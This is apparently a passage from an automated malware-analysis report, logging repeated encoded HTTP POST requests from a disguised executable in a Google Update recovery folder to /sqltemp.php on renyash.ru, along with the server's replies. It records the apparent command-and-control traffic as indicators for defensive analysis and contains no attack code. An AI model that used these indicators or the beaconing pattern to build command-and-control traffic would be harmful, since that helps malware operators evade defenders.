                                                                                                                  Jan 1, 2025 16:02:34.766614914 CET1124OUTData Raw: 56 52 5f 54 54 51 54 56 58 56 52 59 56 5d 59 55 5b 5f 54 5c 55 58 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_TTQTVXVRYV]YU[_T\UXPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&?5X ?*3>3@;%#^?8)=#!1<+;1<$.&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:02:34.854932070 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:35.119611025 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARD4OnDXoQsgscoWt6slAf0WYCaiD0uDPEYZYKwgJQCgY5yRllvAtw0OkrWxrJ35PYSIGGAhHTiH5xEr1E%2F%2Bey96pICFA46SA2p7rAHfAE1Cs4eUq69w0is1N%2FTBzdoIsPNZ4w%2BK"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364238fe08cb1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2395&min_rtt=1967&rtt_var=1593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=270821&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.662541104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:35.263842106 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:35.637654066 CET1124OUTData Raw: 56 53 5f 55 54 51 54 54 58 56 52 59 56 5f 59 56 5b 52 54 59 55 5b 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_UTQTTXVRYV_YV[RTYU[P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3,>7<='=;C,)T#+*'=-#7T<<&/;U9:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:35.736032009 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:36.010420084 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB4E9myUuiXPkWhEpj%2BZPPnuXp4agL%2BJFltbuYhCiGh0Y%2BzTEbbgbLfdOu4k2drjJj29LKcO2whRmgyhYPBgfsOTKEQ9BoiMbPMXD%2F%2Bx5V7zk8YdBSzRjOrIki5ZwE6eKKrwol71"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364290f316a5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3305&min_rtt=1696&rtt_var=3855&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=100171&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.662547104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:36.147686958 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:36.500844002 CET1124OUTData Raw: 53 53 5a 54 51 5c 51 56 58 56 52 59 56 51 59 53 5b 5f 54 51 55 5d 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZTQ\QVXVRYVQYS[_TQU]PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$=]#X3 ;*943<9+* Y!2 <85D2,*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:36.602008104 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:36.862668037 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFJeKBO2LDd2FnP%2FPP9eQlRraKsuI9uwlsxpYR3imbhbTZ%2BovmgdYLMW5e8cXIwhzGnf%2BwrRRqxu7FC5xXfTzh7hl1LMEM4gA9JUxpTYm0Hov1hTxLa%2F48%2FWoKQWFNrSMm49nnZb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3642e79b37c9f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10189&min_rtt=2039&rtt_var=17065&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=21712&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.662556104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:36.991485119 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:37.344645977 CET1124OUTData Raw: 56 54 5a 51 54 51 51 56 58 56 52 59 56 5d 59 5e 5b 5a 54 5a 55 5d 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VTZQTQQVXVRYV]Y^[ZTZU]P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._0)Y4>$8/\97[8Z(:'=. 2?(!%//.&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:02:37.445312977 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:37.715370893 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oNFOT8e%2BoR%2Bj9aOirVtyuSBcBwd2UJGwZlM5F3haShxQt4MxHZMSrWETWmNIis8Q1oXnqPWCO11RjFA2ayQQJpgv1pIUEs5S1kGqBahHBjS3vFJR2KeXUVtXQ3Xw%2FB8CBYwbx8x"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36433ba1e4252-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8039&min_rtt=1726&rtt_var=13273&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=27952&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.662562104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:37.850720882 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:38.204386950 CET1124OUTData Raw: 53 57 5f 53 51 5d 54 55 58 56 52 59 56 50 59 54 5b 5c 54 50 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_SQ]TUXVRYVPYT[\TPU^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.&/#2$.@/:>!.3+:#= ] ! *8)C2+U-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:38.297251940 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:38.556778908 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJpKGtL0Uh3BCWSfTEQuEjsP5F96CDGIgY%2FNPCkMTAszOm%2FIJnyD5kpkDYl72OIhKfi%2F1YsbzUuDsXCTwTvIFTcfNlH7ws0X4MfDyg67HRSONUup8c6OVBSHS67mX8%2BYcauE%2Fn4S"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364391e425e7d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2913&min_rtt=1744&rtt_var=2992&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=131578&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.662570104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:38.694333076 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:39.047736883 CET1124OUTData Raw: 53 53 5f 5c 51 5f 54 53 58 56 52 59 56 50 59 56 5b 53 54 59 55 5f 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_\Q_TSXVRYVPYV[STYU_P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&,>7X0#E827>'(9R=8Z#"/[<-B&#9&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:39.136064053 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.662571104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:39.179245949 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1948
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:39.532218933 CET1948OUTData Raw: 56 51 5a 56 54 58 54 50 58 56 52 59 56 59 59 50 5b 5b 54 5b 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZVTXTPXVRYVYYP[[T[UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'?)Y4<-_%>4.:)U4,Y?:8>X?7?Y<5E%,<-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:39.641855955 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:39.931041956 CET954INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXPBReH2bN0Rzr2DaaZMpmIEXLvDPI9q%2Bh2VZqEqSvWJt4F%2Bys9IY0kroyDhH4LKujMKuvux9OUqcAAF9l4L3b6JShVZjc5DdgMOUDSsEW9r1VQxY9wUClqArFUuKiwfKaB%2FdFDr"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364417e1b0f39-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3187&min_rtt=1735&rtt_var=3555&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2250&delivery_rate=109330&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 09 29 2d 0f 08 31 0c 38 5d 28 3d 2c 0d 27 2e 22 58 2b 5e 3a 5d 33 07 24 04 3e 00 33 5d 36 12 2d 5b 31 38 38 13 23 2d 34 00 24 34 2b 59 05 1c 23 18 36 2f 28 11 28 2d 28 01 32 3c 31 58 27 2e 0e 5d 3c 06 2b 0b 20 2b 23 5b 30 3d 16 5d 3d 39 30 57 24 3f 3f 5b 39 11 08 0a 27 00 2c 54 00 11 26 57 27 1f 1a 59 34 19 24 5c 22 1f 31 12 26 0a 29 08 32 3f 23 18 20 39 08 5f 25 0b 20 00 23 33 2a 5f 26 38 2d 5a 20 2e 34 0b 2a 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&)-18](=,'."X+^:]3$>3]6-[188#-4$4+Y#6/((-(2<1X'.]<+ +#[0=]=90W$??[9',T&W'Y4$\"1&)2?# 9_% #3*_&8-Z .4*%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.662575104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:39.299036026 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:39.657166004 CET1124OUTData Raw: 56 56 5a 53 54 5b 51 57 58 56 52 59 56 58 59 53 5b 5e 54 5f 55 5b 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VVZST[QWXVRYVXYS[^T_U[PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._&<:#,>0=;A,4-8X+=.<!1+[+*%?:&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:39.742878914 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:40.016599894 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FVoF1pwuUWsnpiJB2q7FdLIMqTRdpTpvWUV8UsDCzH3HSPc4sWh5p69IPm9zdS6ELP76xN%2FCs2Tzp8b3AkqhFTyyvOqyxeOJfa1qWA7hPQhx83dZ1hOKhVhKxDoYpCd1Eyer3uc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364421e91c333-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=1691&rtt_var=2172&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=186105&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.662583104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:40.146033049 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:40.501323938 CET1124OUTData Raw: 56 52 5f 51 54 5c 51 55 58 56 52 59 56 5b 59 54 5b 53 54 59 55 59 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_QT\QUXVRYV[YT[STYUYP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$Y5]7=_0.3@/\=V#.8<S)8!"+]<.%'.&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:02:40.589988947 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:40.839793921 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iqssxt3s%2BUx2uWr9bV6ALUAoMtSIptaANKMYaMvvygSXz6RsszSJihbKPJTfzkJYC6rXl8srrpweeH0BjJvs%2BUOFVYQcSfRQZqhLEpA8P8knqZSeAH3b3a%2BwizwvwQ%2BJnHGg5Zg%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364476edd0c78-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2268&min_rtt=1645&rtt_var=1864&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=220045&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.662589104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:40.975280046 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:41.328991890 CET1124OUTData Raw: 53 54 5f 50 51 5c 54 50 58 56 52 59 56 5b 59 50 5b 5d 54 5d 55 5e 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_PQ\TPXVRYV[YP[]T]U^PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/7<.%>'A;- -$^?9#S). ?Z+;&,#U,*&Y.,Y-)
